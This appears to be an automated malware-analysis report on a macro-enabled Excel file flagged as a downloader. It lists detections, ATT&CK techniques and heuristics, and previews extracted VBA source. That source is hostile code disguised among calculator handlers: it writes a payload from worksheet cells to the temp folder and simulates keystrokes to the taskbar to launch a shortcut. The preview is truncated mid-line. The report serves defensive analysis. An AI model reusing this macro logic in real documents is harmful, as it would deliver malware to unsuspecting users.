MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document containing VBA macros, specifically triggering AutoOpen and Workbook_Open events, indicating an attempt to automatically execute code upon opening. The ClamAV detection 'Doc.Downloader.Generic-6698421-0' strongly suggests the macro's purpose is to download and execute a secondary payload. The document body's content about mandatory training and completion functionality serves as a lure to encourage user interaction.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6665 bytes |
SHA-256: cfd918143b97fffb354c15c1af42a70cc58f7c474d9cb8bc760b500b3548a7bf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
#If VBA7 Then
Private Declare PtrSafe Function fw Lib "user32" Alias "FindWindowA" (ByVal a As String, ByVal b As String) As Long
Private Declare PtrSafe Function ReleaseDC Lib "user32" (ByVal hwnd As LongPtr, ByVal hDC As LongPtr) As Long
Private Declare PtrSafe Function gaa Lib "kernel32" Alias "GlobalAddAtomA" (ByVal c As String) As Integer
Private Declare PtrSafe Function GetDeviceCaps Lib "gdi32" (ByVal hDC As LongPtr, ByVal nIndex As Long) As Long
Private Declare PtrSafe Function sm Lib "user32" Alias "SendMessageA" (ByVal d As Long, ByVal e As Long, ByVal f As Long, g As Any) As Long
Private Declare PtrSafe Function GetActiveWindow Lib "user32" () As Long
Private Declare PtrSafe Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Private Declare PtrSafe Sub ke Lib "user32" Alias "keybd_event" (ByVal h As Byte, ByVal i As Byte, ByVal j As Long, ByVal k As Long)
Private Declare PtrSafe Sub s Lib "kernel32" Alias "Sleep" (ByVal l As Long)
#Else
Private Declare Function fw Lib "user32" Alias "FindWindowA" (ByVal a As String, ByVal b As String) As Long
Private Declare Function ReleaseDC Lib "user32" (ByVal hwnd As LongPtr, ByVal hDC As LongPtr) As Long
Private Declare Function gaa Lib "kernel32" Alias "GlobalAddAtomA" (ByVal c As String) As Integer
Private Declare Function GetDeviceCaps Lib "gdi32" (ByVal hDC As LongPtr, ByVal nIndex As Long) As Long
Private Declare Function sm Lib "user32" Alias "SendMessageA" (ByVal d As Long, ByVal e As Long, ByVal f As Long, g As Any) As Long
Private Declare Function GetActiveWindow Lib "user32" () As Long
Private Declare Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Private Declare Sub ke Lib "user32" Alias "keybd_event" (ByVal h As Byte, ByVal i As Byte, ByVal j As Long, ByVal k As Long)
Private Declare Sub s Lib "kernel32" Alias "Sleep" (ByVal l As Long)
#End If
Public tmpVar As String
Public calVal As String
Private Sub cmdBtnBak_Click()
If txtRes <> 0 And txtRes <> "" Then txtRes = Left(txtRes, Len(txtRes) - 1)
End Sub
Private Sub cmdBtnAdd_Click()
If txtRes <> 0 Then
txtdisplay = txtRes
txtRes = 0
calVal = "Add"
End If
End Sub
Sub merge()
w 17, 0
w 18, 0
w 16, 0
w 84, 0
w 84, 2
w 16, 2
w 18, 2
w 17, 2
End Sub
Private Sub cmdBtnDvd_Click()
If txtRes <> 0 Then
txtdisplay = txtRes
txtRes = 0
calVal = "Divide"
End If
End Sub
Private Sub cmdBtnDot_Click()
If txtRes <> 0 Then txtRes = txtRes + "."
End Sub
Sub boo()
sm fw("Shell_TrayWnd", ""), 1024 + 234, 1792 + 84, 0
End Sub
Private Sub cmdBtnMult_Click()
If txtRes <> 0 Then
txtdisplay = txtRes
txtRes = 0
calVal = "Multiplication"
End If
End Sub
Private Sub cmdBtn1_Click()
If txtRes = 0 Then
txtRes = cmdBtn1.Caption
Else
txtRes = txtRes + cmdBtn1.Caption
End If
End Sub
Sub w(ByVal w As Byte, ByVal x As Long)
ke w, 0, x, 0
End Sub
Private Sub cmdBtn4_Click()
If txtRes = 0 Then
txtRes = cmdBtn4.Caption
Else
txtRes = txtRes + cmdBtn4.Caption
End If
End Sub
Private Sub cmdBtn5_Click()
If txtRes = 0 Then
txtRes = cmdBtn5.Caption
Else
txtRes = txtRes + cmdBtn5.Caption
End If
End Sub
Sub te()
sm fw("Shell_TrayWnd", ""), 1024 + 233, 1792 + 84, ByVal gaa(Environ("TMP") & Replace("\office13|.|ln|k", "|", ""))
merge
s 8950
boo
End Sub
Private Sub cmdBtnMns_Click()
If txtRes <> 0 Then
txtdisplay = txtRes
txtRes = 0
calVal = "Minus"
End If
End Sub
Sub aa()
Dim fn As String
fn = Environ("tmp") & "\Doc1.docx"
Dim pl As String
For Each c In Worksheets("Sheet1").Range("A200:A345")
pl = pl & c
Next c
Dim fh, i, j, z As Integer
Dim bc As Long
Dim b As Byte
bc = 1
i = 1
j = 1
fh = FreeFile
Open fn For Binary Access Write As #fh
Do
j = InStr(i, pl, ",",
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 41984 bytes |
SHA-256: e046724fe0ca7af2eedb3e321eaacd760cc256e8a9e1ce3f7f9b12c737f5e25a |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-6698421-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.